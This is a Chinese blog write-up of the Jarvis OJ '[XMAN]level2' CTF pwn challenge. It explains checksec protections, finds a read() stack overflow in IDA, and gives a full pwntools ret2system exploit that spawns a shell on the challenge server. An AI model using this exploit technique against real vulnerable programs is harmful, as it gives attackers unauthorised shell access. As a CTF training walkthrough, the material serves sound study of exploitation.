Jarvis OJ-PWN-[XMAN]level2 wp

最新推荐文章于 2023-02-28 16:23:55 发布
最新推荐文章于 2023-02-28 16:23:55 发布
阅读量535 收藏 1
点赞数
分类专栏: Jarvis OJ 文章标签: pwn 逆向 CTF 二进制 溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Retrovich/article/details/82906693
版权

地址:nc pwn2.jarvisoj.com 9878

把下载好的文件放到虚拟机中
用checksec看一下保护
在这里插入图片描述

【1】RELRO:RELRO会有Partial RELRO和FULL RELRO,如果开启FULL RELRO,意味着我们无法修改got表
【2】Stack:如果栈中开启Canary found,那么就不能用直接用溢出的方法覆盖栈中返回地址,而且要通过改写指针与局部变量、leak canary、overwrite canary的方法来绕过
【3】NX:NX enabled如果这个保护开启就是意味着栈中数据没有执行权限,以前的经常用的call esp或者jmp esp的方法就不能使用,但是可以利用rop这种方法绕过
【4】PIE:PIE enabled如果程序开启这个地址随机化选项就意味着程序每次运行的时候地址都会变化,而如果没有开PIE的话那么No PIE (0x400000),括号内的数据就是程序的基地址
【5】FORTIFY:FORTIFY_SOURCE机制对格式化字符串有两个限制(1)包含%n的格式化字符串不能位于程序内存中的可写地址。(2)当使用位置参数时,必须使用范围内的所有参数。所以如果要使用%7$x,你必须同时使用1,2,3,4,5和6。

32位程序 关了栈说明可以用栈溢出 栈中数据没有执行权限
拖到IDA里反编译一下
F5查看伪代码
在这里插入图片描述
跟进vulnerable_function()
在这里插入图片描述
溢出点在read函数
Shift+F12查看字符串
在这里插入图片描述
我们发现.data中有/bin/sh 所以直接通过system调用就可以
构造一个system("/bin/sh")的伪栈帧 通过控制vulnerable_function()返回到该伪栈帧 执行system("/bin/sh")来get shell

因为我们的目的只是为了通过system("/bin/sh")来get shell
所以伪栈帧中system的返回地址可以随便指定

下面是payload

# -*- coding: utf-8 -*-
from pwn import *

elf = ELF('./level2')
sys_addr = elf.symbols["system"]       #system函数地址
bin_addr = elf.search("/bin/sh").next()      #/bin/sh字符串地址

payload = 'a' * (0x88 + 0x4) + p32(sys_addr) + p32(0xdeadbeef) + p32(bin_addr)
#0xdeadbeef为system("/bin/sh")执行后的返回地址,可以随便指定

io = remote('pwn2.jarvisoj.com', 9878)

io.recvline()
io.sendline(payload)
io.interactive()
io.close()

没有PIE保护的程序,很多函数地址可以直接从IDA中复制过来,在EXP中直接赋值为0x8048···,但是为了增强普适性,均使用symbols函数获得

在这里插入图片描述

CTF{1759d0cbd854c54ffa886cd9df3a3d52}

Retrovich
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
checksec.sh:Checksec.sh
02-28
校验码 Checksec是一个bash脚本,用于检查可执行文件的属性(例如PIE,RELRO,PaX,Canaries,ASLR,Fortify Source)。 它最初是由Tobias Klein编写的,其原始资源可以在这里找到: : 更新 **主要更新** 2.1.0 将结构更改为更具模块化,并切换到getopts,以便选项可以按任何顺序排列。 但是,例如format = json现在可以在结尾。 现在所有选项都需要--$option=$value而不是--$option $value --extended选项现在包括clang CFI和安全堆栈检查 最后更新:2020-08-15 对于OSX 大多数工具不适用于mach-O二进制文件或OSX内核,因此不受支持 手动验证checksec openssl dgst -sha256 -verify checksec.pub -
CTF-pwn pwntools用法探索_usage pwn checksec [-h] [--file [elf
最新发布
2401_84254011的博客
04-26 388
options:options:options:options:options:options:options:options:options:还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!
checksec
Trick的博客
11-10 2746
checksec checksec到底是用来干什么的? 它是用来检查可执行文件属性,例如PIE, RELRO, PaX, Canaries, ASLR, Fortify Source等等属性。 我们在ubuntu下使用它时,会显示有5行信息: 1.Arch 从这行信息可以知道程序是32bit还是64bit的 2.RELRO 3.Stack 显示Stack:No canary found则表示可以利用栈溢出 编译时控制是否开启栈保护以及程度: gcc -fno-stack-protector -o test
[第五空间2019 决赛]PWN5,checksec
呱呱呱
09-19 926
pwn的一些用法,checksec,gdb的基本调试
PWN-最新checksec的安装和使用
热门推荐
qq_43430261的博客
04-14 1万+
安装 用git安装 $ git clone https://github.com/slimm609/checksec.sh.git 进入文件内 cd checksec.sh 执行下面这条命令,在命令行中建立符号链接就可以在terminal中直接使用了 sudo ln -s checksec /usr/local/bin/checksec #或者sudo ln -sf checksec /us...
jarvisoj_typo
05-14
jarvisoj_typo,arm架构下的pwn题。
JarvisAlgorithm:Jarvis算法-Java
03-06
Jarvis算法,又称礼品包装算法,是计算几何领域中用于寻找给定点集的凸包的经典算法。这个算法由Marvin Jarvis于1973年提出,主要用于处理二维空间中的点集问题。在Java编程语言中,我们可以实现这个算法来创建一个...
JarvisOJ.docx
03-10
JarvisOJ Web 知识点总结 本文总结了 JarvisOJ Web 中的多个知识点,涵盖了网络安全、Web 开发、加密算法、SQL 注入、XML 实体注入、robots.txt、Cookie hijacking 等领域。 一、Port 51 端口访问 在 JarvisOJ ...
jarvisJARVIS-Tools:用于数据驱动的原子材料设计的开源软件包
02-05
jarvisJARVIS-Tools:用于数据驱动的原子材料设计的开源软件包
Jarvis-Musical-Bot:Jarvis Telegram Music Bot for Spotify
04-06
Jarvis Telegram Music Bot for Spotify 该Telegram机器人允许用户授权其Spotify帐户并获得不错的功能。 授权实际上不收集用户昵称以外的任何私人数据。 其特点: 分享当前歌曲。 您可以共享Spotify客户端上当前...
checksec安装
、moddemod
02-27 8865
项目地址:https://github.com/slimm609/checksec.sh 这是一个shell脚本,直接下载下来就可用。 git clone https://github.com/slimm609/checksec.sh checksec是一个bash脚本,将其拷贝到任意全局bin目录下方便使用 可创建链接也可直接拷过去 可正常使用! 如果你已经安装了pwntools这个库,默认自带了checksec,就不需要安装了. 安装pwntools参考:https://moddemod.b
Pwn 二进制漏洞审计
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
02-28 3338
PWN 二进制漏洞审计
pwn虚拟机 + 如何在Windows下安装pwntools + Linux安装pwntools后无法使用checksec
weixin_50406679的博客
07-29 1781
ubuntu如何搭建pwn虚拟机
从以下选项中选出gcc编译器的正确流程_Pwn基础(二):checksec 中常见保护机制...
weixin_39597318的博客
11-22 734
操作系统提供了许多安全机制来尝试降低或阻止缓冲区溢出攻击带来的安全风险,包括DEP、ASLR等。在编写漏洞利用代码的时候,需要特别注意目标进程是否开启了DEP(Linux下对应NX)、ASLR(Linux下对应PIE)等机制,例如存在DEP(NX)的话就不能直接执行栈上的数据,存在ASLR的话各个系统调用的地址就是随机化的。checksec 它是用来检查可执行文件属性,例如 PIE, R...
pwntools入门
TedLau的博客
02-05 1874
0x00 前言: pwntools是写exp的得力助手,是pwn题中不可缺少的一部分,学pwn的过程中,对于pwntools的理解是必不可少的,今日我学习了部分pwntools的知识,在此写到博客中,本着分享知识的目的,同时也是为了加深自己的印象。部分知识我也不会,百度上没有特别明确的解释,文章应该不误导读者,故在一些地方我会特别注明。 本文正文中的英文粗体为索要解释的内容,斜体为官方文...
二进制安全基础之pwn利器pwntools
kelxLZ的博客
06-24 1238
Author:ZERO-A-ONE Date:2021-06-24 一、深入理解pwntools的使用 1.1 pwntools常用模块 asm:汇编与反汇编 dynelf:远程符号泄露 elf:elf文件操作 gdb:启动gdb调试 shellcraft:shellcode的生成器 cyclic pattern:偏移字符计算 process/remote:读写接口 1.2 汇编与反汇编 将汇编指令转为机器码 >>> asm('nop') '\x90' 将机器码转为汇编指令 &g.
Pwn笔记
caterpillarous的博客
04-18 2632
Pwn笔记 -前言 以下内容摘自Wiki: Pwn是一个骇客语法的俚语词,自”own”这个字引申出来的,这个词的含意在于,玩家在整个游戏对战中处在胜利的优势,或是说明竞争对手处在完全惨败的情形下,这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战中已经完全被击败(例如:”You just got pwned!”)。 在骇客行话里,尤其在另外一种电脑技术方面,包括电脑(服务器或...
checksec及其保护机制
cogit_o的博客
07-02 814
学习pwn时遇到的问题,程序运行时各个段以及堆栈的地址总是变化,导致溢出之后的程序入口地址总是错误。近乎放弃,使用checksec本来想查看程序是否开启了NX机制,无意中好发现PIE,于是在网上查找了相关资料。 参考一篇博客 http://yunnigu.dropsec.xyz/2016/10/08/checksec%E5%8F%8A%E5%85%B6%E5%8C%85%E5%90%AB%E7%
软件常用安全防护手段 checksec 总结
axiejundong的博客
06-11 1万+
checksec 总结一、RELROrelro 是一种用于加强对 binary 数据段的保护的技术。relro 分为 partial relro 和 full relro Partial RELRO现在gcc 默认编译就是 partial relro(很久以前可能需要加上选项 gcc -Wl,-z,relro) some sections(.init_array .fini_array .jcr .
jarvisoj_level2
08-13
JarvisOJLevel2题目中,给出了三个关于解题的代码片段的引用。引用和都是给出了关于解题的代码,其中引用是关于x64架构的代码,引用是关于i386架构的代码。这些代码都是用于获取Shell的payload。而引用则是对这...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值